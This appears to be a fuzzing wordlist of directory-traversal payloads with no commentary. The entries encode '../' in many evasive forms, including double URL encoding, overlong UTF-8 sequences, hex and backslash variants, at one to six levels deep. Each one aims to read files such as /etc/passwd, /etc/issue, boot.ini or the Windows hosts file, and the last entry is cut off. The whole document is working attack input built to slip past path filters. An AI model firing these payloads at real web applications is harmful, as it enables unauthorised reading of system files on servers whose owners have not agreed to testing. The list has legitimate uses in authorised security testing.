-%5C..%%32%%66%5C..%%32%%66%5C..%%32%%66%5C..%%32%%66%5C..%%32%%66%5C..%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63boot.ini -%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%%35%%63%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63%5C..%%35%%63boot.ini -%5C..%%35%%63%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63boot.ini -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63boot.ini -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63boot.ini -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63passwd -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63etc%%35%%63issue -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63boot.ini -%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63%5C..%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%afboot.ini -%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%af%5C..%e0%80%afboot.ini -%5C..%e0%80%af%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afboot.ini -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afboot.ini -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afboot.ini -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afpasswd -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afetc%e0%80%afissue -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afboot.ini -%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%af%5C..%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259cboot.ini -%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259c%5C..%25c1%259cboot.ini -%5C..%25c1%259c%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cboot.ini -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cboot.ini -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cboot.ini -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cpasswd -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cetc%25c1%259cissue -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cboot.ini -%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259c%5C..%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25afboot.ini -%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25af%5C..%25c0%25afboot.ini -%5C..%25c0%25af%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afboot.ini -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afboot.ini -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afboot.ini -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afpasswd -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afetc%25c0%25afissue -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afboot.ini -%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25af%5C..%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%af%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%af%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afpasswd -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afetc%f0%80%80%afissue -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afboot.ini -%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%af%5C..%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afetc%f8%80%80%80%afissue -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afboot.ini -%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%af%5C..%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.%2e/etc/passwd -.%2e/etc/issue -.%2e/boot.ini -.%2e/windows/system32/drivers/etc/hosts -.%2e/.%2e/etc/passwd -.%2e/.%2e/etc/issue -.%2e/.%2e/boot.ini -.%2e/.%2e/windows/system32/drivers/etc/hosts -.%2e/.%2e/.%2e/etc/passwd -.%2e/.%2e/.%2e/etc/issue -.%2e/.%2e/.%2e/boot.ini -.%2e/.%2e/.%2e/windows/system32/drivers/etc/hosts -.%2e/.%2e/.%2e/.%2e/etc/passwd -.%2e/.%2e/.%2e/.%2e/etc/issue -.%2e/.%2e/.%2e/.%2e/boot.ini -.%2e/.%2e/.%2e/.%2e/windows/system32/drivers/etc/hosts -.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd -.%2e/.%2e/.%2e/.%2e/.%2e/etc/issue -.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini -.%2e/.%2e/.%2e/.%2e/.%2e/windows/system32/drivers/etc/hosts -.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd -.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/issue -.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini -.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/system32/drivers/etc/hosts -.%2e\etc\passwd -.%2e\etc\issue -.%2e\boot.ini -.%2e\windows\system32\drivers\etc\hosts -.%2e\.%2e\etc\passwd -.%2e\.%2e\etc\issue -.%2e\.%2e\boot.ini -.%2e\.%2e\windows\system32\drivers\etc\hosts -.%2e\.%2e\.%2e\etc\passwd -.%2e\.%2e\.%2e\etc\issue -.%2e\.%2e\.%2e\boot.ini -.%2e\.%2e\.%2e\windows\system32\drivers\etc\hosts -.%2e\.%2e\.%2e\.%2e\etc\passwd -.%2e\.%2e\.%2e\.%2e\etc\issue -.%2e\.%2e\.%2e\.%2e\boot.ini -.%2e\.%2e\.%2e\.%2e\windows\system32\drivers\etc\hosts -.%2e\.%2e\.%2e\.%2e\.%2e\etc\passwd -.%2e\.%2e\.%2e\.%2e\.%2e\etc\issue -.%2e\.%2e\.%2e\.%2e\.%2e\boot.ini -.%2e\.%2e\.%2e\.%2e\.%2e\windows\system32\drivers\etc\hosts -.%2e\.%2e\.%2e\.%2e\.%2e\.%2e\etc\passwd -.%2e\.%2e\.%2e\.%2e\.%2e\.%2e\etc\issue -.%2e\.%2e\.%2e\.%2e\.%2e\.%2e\boot.ini -.%2e\.%2e\.%2e\.%2e\.%2e\.%2e\windows\system32\drivers\etc\hosts -.%2e%2fetc%2fpasswd -.%2e%2fetc%2fissue -.%2e%2fboot.ini -.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%2f.%2e%2fetc%2fpasswd -.%2e%2f.%2e%2fetc%2fissue -.%2e%2f.%2e%2fboot.ini -.%2e%2f.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%2f.%2e%2f.%2e%2fetc%2fpasswd -.%2e%2f.%2e%2f.%2e%2fetc%2fissue -.%2e%2f.%2e%2f.%2e%2fboot.ini -.%2e%2f.%2e%2f.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fpasswd -.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fissue -.%2e%2f.%2e%2f.%2e%2f.%2e%2fboot.ini -.%2e%2f.%2e%2f.%2e%2f.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fpasswd -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fissue -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fboot.ini -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fpasswd -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fetc%2fissue -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fboot.ini -.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2f.%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.%2e%5cetc%5cpasswd -.%2e%5cetc%5cissue -.%2e%5cboot.ini -.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e%5c.%2e%5cetc%5cpasswd -.%2e%5c.%2e%5cetc%5cissue -.%2e%5c.%2e%5cboot.ini -.%2e%5c.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e%5c.%2e%5c.%2e%5cetc%5cpasswd -.%2e%5c.%2e%5c.%2e%5cetc%5cissue -.%2e%5c.%2e%5c.%2e%5cboot.ini -.%2e%5c.%2e%5c.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cpasswd -.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cissue -.%2e%5c.%2e%5c.%2e%5c.%2e%5cboot.ini -.%2e%5c.%2e%5c.%2e%5c.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cpasswd -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cissue -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cboot.ini -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cpasswd -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cetc%5cissue -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cboot.ini -.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5c.%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.%2e0x2fetc0x2fpasswd -.%2e0x2fetc0x2fissue -.%2e0x2fboot.ini -.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x2f.%2e0x2fetc0x2fpasswd -.%2e0x2f.%2e0x2fetc0x2fissue -.%2e0x2f.%2e0x2fboot.ini -.%2e0x2f.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fpasswd -.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fissue -.%2e0x2f.%2e0x2f.%2e0x2fboot.ini -.%2e0x2f.%2e0x2f.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fpasswd -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fissue -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fboot.ini -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fpasswd -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fissue -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fboot.ini -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fpasswd -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fetc0x2fissue -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fboot.ini -.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2f.%2e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.%2e0x5cetc0x5cpasswd -.%2e0x5cetc0x5cissue -.%2e0x5cboot.ini -.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e0x5c.%2e0x5cetc0x5cpasswd -.%2e0x5c.%2e0x5cetc0x5cissue -.%2e0x5c.%2e0x5cboot.ini -.%2e0x5c.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cpasswd -.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cissue -.%2e0x5c.%2e0x5c.%2e0x5cboot.ini -.%2e0x5c.%2e0x5c.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cpasswd -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cissue -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cboot.ini -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cpasswd -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cissue -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cboot.ini -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cpasswd -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cetc0x5cissue -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cboot.ini -.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5c.%2e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.%2e%252fetc%252fpasswd -.%2e%252fetc%252fissue -.%2e%252fboot.ini -.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%252f.%2e%252fetc%252fpasswd -.%2e%252f.%2e%252fetc%252fissue -.%2e%252f.%2e%252fboot.ini -.%2e%252f.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%252f.%2e%252f.%2e%252fetc%252fpasswd -.%2e%252f.%2e%252f.%2e%252fetc%252fissue -.%2e%252f.%2e%252f.%2e%252fboot.ini -.%2e%252f.%2e%252f.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fpasswd -.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fissue -.%2e%252f.%2e%252f.%2e%252f.%2e%252fboot.ini -.%2e%252f.%2e%252f.%2e%252f.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fpasswd -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fissue -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fboot.ini -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fpasswd -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fetc%252fissue -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fboot.ini -.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252f.%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.%2e%255cetc%255cpasswd 